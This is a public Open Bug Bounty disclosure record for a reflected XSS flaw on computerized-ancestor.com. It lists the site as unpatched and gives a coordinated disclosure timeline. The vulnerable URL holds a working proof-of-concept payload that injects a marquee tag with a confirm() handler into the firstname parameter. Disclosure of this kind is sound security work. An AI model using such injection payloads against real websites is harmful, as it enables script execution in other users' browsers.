computerized-ancestor.com XSS vulnerability

2017-10-08T22:49:00
ID OBB:328688
Type openbugbounty
Reporter eb
Modified 2018-01-06T23:39:00

Description

Vulnerable URL:
https://www.computerized-ancestor.com/?firstname=%22%3E%3Cmarquee%20onstart=confirm(/openbugbounty/)%3E&lastname;=Smith&gender;=f&birthyear;=&birthloc;=&spfirstname;=&splastname;=&spbirthyear;=&spbirthloc;=
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 06.01.2018
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 12538992
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 8 October, 2017 22:49 GMT
Generic security notifications sent to website owner| 8 October, 2017 22:52 GMT
Notification sent to subscribers (without technical details)| 9 October, 2017 02:17 GMT
Vulnerability details disclosed by researcher| 6 January, 2018 23:39 GMT